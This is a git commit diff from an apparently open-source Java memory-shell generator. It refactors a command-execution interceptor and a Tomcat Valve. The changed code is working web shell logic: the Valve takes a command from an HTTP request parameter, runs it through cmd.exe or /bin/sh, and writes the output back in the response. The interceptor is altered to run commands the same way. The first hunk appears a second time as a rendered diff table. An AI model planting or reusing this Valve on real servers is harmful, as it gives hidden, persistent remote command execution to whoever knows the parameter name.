refactor: simplify command shell

ReaJason · ReaJason · commit 88ced9a2d3fe · 2025-09-01T18:20:32.000+08:00
diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/command/RuntimeExecInterceptor.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/command/RuntimeExecInterceptor.java
@@ -12,6 +12,7 @@
 public class RuntimeExecInterceptor {
     @Advice.OnMethodExit
     public static void enter(@Advice.Argument(value = 0) String cmd, @Advice.Return(readOnly = false) InputStream returnValue) throws IOException {
-        returnValue = Runtime.getRuntime().exec(cmd).getInputStream();
+        String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
+        returnValue = new ProcessBuilder(cmds).redirectErrorStream(true).start().getInputStream();
     }
 }
diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandValve.java b/generator/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandValve.java
@@ -8,25 +8,21 @@
 import javax.servlet.ServletOutputStream;
 import java.io.IOException;
 import java.io.InputStream;
+import java.util.Scanner;
 
 /**
  * @author ReaJason
  */
 public class CommandValve implements Valve {
-    private static String paramName;
+    static String paramName;
 
     @Override
     public void invoke(Request request, Response response) throws IOException, ServletException {
         try {
             String param = getParam(request.getParameter(paramName));
             if (param != null) {
                 InputStream inputStream = getInputStream(param);
-                ServletOutputStream outputStream = response.getOutputStream();
-                byte[] buf = new byte[8192];
-                int length;
-                while ((length = inputStream.read(buf)) != -1) {
-                    outputStream.write(buf, 0, length);
-                }
+                response.getWriter().write(new Scanner(inputStream).useDelimiter("\\A").next());
                 return;
             }
         } catch (Throwable e) {
@@ -43,8 +39,7 @@ private InputStream getInputStream(String cmd) throws Exception {
         return null;
     }
 
-    protected Valve next;
-    protected boolean asyncSupported;
+    Valve next;
 
     @Override
     public Valve getNext() {
@@ -58,7 +53,7 @@ public void setNext(Valve valve) {
 
     @Override
     public boolean isAsyncSupported() {
-        return this.asyncSupported;
+        return false;
     }
 
     @Override

Original file line number	Diff line number	Diff line change
`@@ -12,6 +12,7 @@`
`12`	`12`	`public class RuntimeExecInterceptor {`
`13`	`13`	`@Advice.OnMethodExit`
`14`	`14`	`public static void enter(@Advice.Argument(value = 0) String cmd, @Advice.Return(readOnly = false) InputStream returnValue) throws IOException {`
`15`		`- returnValue = Runtime.getRuntime().exec(cmd).getInputStream();`
	`15`	`+ String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};`
	`16`	`+ returnValue = new ProcessBuilder(cmds).redirectErrorStream(true).start().getInputStream();`
`16`	`17`	`}`
`17`	`18`	`}`